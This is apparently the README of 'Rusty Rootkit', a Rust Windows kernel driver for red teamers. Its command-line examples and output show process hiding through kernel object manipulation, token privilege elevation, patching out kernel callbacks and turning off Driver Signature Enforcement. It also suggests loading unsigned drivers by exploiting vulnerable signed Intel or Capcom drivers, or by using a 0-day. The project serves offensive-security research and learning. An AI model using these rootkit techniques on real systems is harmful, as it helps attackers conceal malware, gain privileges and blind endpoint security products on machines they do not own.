Windows Kernel Driver in Rust (Rusty Rootkit) for Red Teamers
Features (Development in progress)
- Protect / unprotect process (Done)
- Elevate / remove token privileges (Done)
- Hide process (Done)
- Hide driver (Todo)
- Enumerate / remove kernel callbacks
- PsSetCreateProcessNotifyRoutine (Done)
- PsSetCreateThreadNotifyRoutine (Todo)
- PsSetLoadImageNotifyRoutine (Todo)
- CmRegisterCallbackEx (Todo)
- ObRegisterCallbacks (Todo)
- DSE enable/disable (Done)
- Kernel mode manual mapper (Todo)
Usage
PS C:\Users\memn0ps\Desktop> .\client.exe -h
client 0.1.0
USAGE:
client.exe <SUBCOMMAND>
OPTIONS:
-h, --help Print help information
-V, --version Print version information
SUBCOMMANDS:
callbacks
dse
help Print this message or the help of the given subcommand(s)
process
client.exe-process
USAGE:
client.exe process --name <PROCESS> <--protect|--unprotect|--elevate|--hide>
OPTIONS:
-e, --elevate Elevate all token privileges
-h, --help Print help information
--hide Hide a process using Direct Kernel Object Manipulation (DKOM)
-n, --name <PROCESS> Target process name
-p, --protect Protect a process
-u, --unprotect Unprotect a process
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks -h
client.exe-callbacks
USAGE:
client.exe callbacks <--enumerate|--patch <PATCH>>
OPTIONS:
-e, --enumerate Enumerate kernel callbacks
-h, --help Print help information
-p, --patch <PATCH> Patch kernel callbacks 0-63
Example 1: Enumerate and patch kernel callbacks
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --enumerate
Total Kernel Callbacks: 11
[0] 0xffffbd8d3d2502df ("ntoskrnl.exe")
[1] 0xffffbd8d3d2fe81f ("cng.sys")
[2] 0xffffbd8d3db2bc8f ("WdFilter.sys")
[3] 0xffffbd8d3db2bf8f ("ksecdd.sys")
[4] 0xffffbd8d3db2c0df ("tcpip.sys")
[5] 0xffffbd8d3f10705f ("iorate.sys")
[6] 0xffffbd8d3f10765f ("CI.dll")
[7] 0xffffbd8d3f10789f ("dxgkrnl.sys")
[8] 0xffffbd8d3fa37cff ("vm3dmp.sys")
[9] 0xffffbd8d3f97104f ("peauth.sys")
[10] 0xffffbd8d43afb63f ("Eagle.sys")
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --patch 10
[+] Callback patched successfully at index 10
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --enumerate
Total Kernel Callbacks: 10
[0] 0xffffbd8d3d2502df ("ntoskrnl.exe")
[1] 0xffffbd8d3d2fe81f ("cng.sys")
[2] 0xffffbd8d3db2bc8f ("WdFilter.sys")
[3] 0xffffbd8d3db2bf8f ("ksecdd.sys")
[4] 0xffffbd8d3db2c0df ("tcpip.sys")
[5] 0xffffbd8d3f10705f ("iorate.sys")
[6] 0xffffbd8d3f10765f ("CI.dll")
[7] 0xffffbd8d3f10789f ("dxgkrnl.sys")
[8] 0xffffbd8d3fa37cff ("vm3dmp.sys")
[9] 0xffffbd8d3f97104f ("peauth.sys")
Example 2: Protect a process and elevate token privileges
PS C:\Users\memn0ps\Desktop> .\client.exe process --name notepad.exe --protect
[+] Process protected successfully 8248
PS C:\Users\memn0ps\Desktop> .\client.exe process --name notepad.exe --elevate
[+] Tokens privileges elevated successfully 8248
Example 3: Enable / Disable Driver Signature Enforcement (DSE)
PS C:\Users\memn0ps\Desktop> .\client.exe dse --enable
Bytes returned: 16
[+] Driver Signature Enforcement (DSE) enabled: 0x6
0: kd> db 0xfffff8005a6683b8 L1
fffff800`5a6683b8 06
PS C:\Users\memn0ps\Desktop> .\client.exe dse --disable
Bytes returned: 16
[+] Driver Signature Enforcement (DSE) disabled: 0xe
0: kd> db 0xfffff8005a6683b8 L1
fffff800`5a6683b8 0e
Example 3: Hide Process
PS C:\Users\memn0ps\Desktop> .\client.exe process --name powershell.exe --hide
[+] Process is hidden successfully: 6376
Install Rust
To start using Rust, download the installer, then run the program and follow the onscreen instructions. You may need to install the Visual Studio C++ Build tools when prompted to do so.
Install
Install and change to Rust nightly
rustup toolchain install nightly
rustup default nightly
Install cargo-make
Install cargo-make
cargo install cargo-make
Install WDK/SDK
- Step 1: Install Visual Studio 2019
- Step 2: Install Windows 11 SDK (22000.1)
- Step 3: Install Windows 11 WDK
Build Driver
Change directory to .\driver\
and build driver
cargo make sign
Build Client
Change directory to .\client\
and build client
cargo build
Test Mode
or Test Signing
Mode
Enable bcdedit /set testsigning on
[Optional] Debug via Windbg
bcdedit /debug on
bcdedit /dbgsettings net hostip:<IP> port:<PORT>
Create / Start Service
You can use Service Control Manager or OSR Driver Loader to load your driver.
PS C:\Users\memn0ps> sc.exe create Eagle type= kernel binPath= C:\Windows\System32\Eagle.sys
[SC] CreateService SUCCESS
PS C:\Users\memn0ps> sc.exe query Eagle
SERVICE_NAME: Eagle
TYPE : 1 KERNEL_DRIVER
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\Users\memn0ps> sc.exe start Eagle
SERVICE_NAME: Eagle
TYPE : 1 KERNEL_DRIVER
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 0
FLAGS :
PS C:\Users\memn0ps> sc.exe stop Eagle
SERVICE_NAME: Eagle
TYPE : 1 KERNEL_DRIVER
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Currently, this driver does not support manual mapping. However, an alternative way to load your driver is to manually map it by exploiting an existing CVE in a signed driver that is already loaded such as Intel or Capcom, although vulnerable drivers can be flagged easily by EDRs or ACs.
- https://github.com/TheCruZ/kdmapper (
iqvw64e.sys
Intel driver) - https://github.com/not-wlan/drvmap (
capcom.sys
Capcom driver) - https://github.com/zorftw/kdmapper-rs
Otherwise you can always get an extended validation (EV) code signing certificate by Microsoft which goes through a "vetting" process or use a 0-day which is really up to you lol.
Note
A better way to code Windows Kernel Drivers in Rust is to create bindings as shown in the references below. However, using someone else's bindings hides the functionality and this is why I made it the classic way unless, of course, you create your own bindings. I plan on refactoring the code in the future but for now, it will be a bit messy and incomplete.
I made this project for fun and because I really like Rust and Windows Internals. This is obviously not perfect or finished yet. if you would like to learn more about Windows Kernel Programming then feel free to check out the references below. The prefered safe and robust way of coding Windows Kernel Drivers in Rust is shown here:
References and Credits
- https://not-matthias.github.io/kernel-driver-with-rust/ (Big thanks to @not_matthias)
- https://github.com/not-matthias/kernel-driver-with-rust/
- https://courses.zeropointsecurity.co.uk/courses/offensive-driver-development (Big thanks to @_RastaMouse)
- https://leanpub.com/windowskernelprogramming Windows Kernel Programming Book (Big thanks to Pavel Yosifovich @zodiacon)
- https://www.amazon.com/Rootkits-Subverting-Windows-Greg-Hoglund/dp/0321294319 (Big thanks to Greg Hoglund and James Butler for Rootkits: Subverting the Windows Kernel Book)
- https://codentium.com/guides/windows-dev/
- https://github.com/StephanvanSchaik/windows-kernel-rs/
- https://github.com/rmccrystal/kernel-rs
- https://github.com/pravic/winapi-kmd-rs
- https://guidedhacking.com/
- https://www.unknowncheats.me/
- https://gamehacking.academy/
- https://secret.club/
- https://back.engineering/
- https://www.vergiliusproject.com/kernels/x64
- https://www.crowdstrike.com/blog/evolution-protected-processes-part-1-pass-hash-mitigations-windows-81/
- https://discord.com/invite/rust-lang-community (Big thanks to: WithinRafael, Nick12, Zuix, DuckThatSits, matt1992, kpreid and many others)
- https://twitter.com/the_secret_club/status/1386215138148196353 Discord (hugsy, themagicalgamer)
- https://www.rust-lang.org/
- https://doc.rust-lang.org/book/
- https://posts.specterops.io/mimidrv-in-depth-4d273d19e148
- https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/
- https://www.mdsec.co.uk/2021/06/bypassing-image-load-kernel-callbacks/
- https://m0uk4.gitbook.io/notebooks/mouka/windowsinternal/find-kernel-module-address-todo
- https://github.com/XaFF-XaFF/Cronos-Rootkit/
- https://github.com/JKornev/hidden
- https://github.com/landhb/HideProcess
- https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/manipulating-activeprocesslinks-to-unlink-processes-in-userland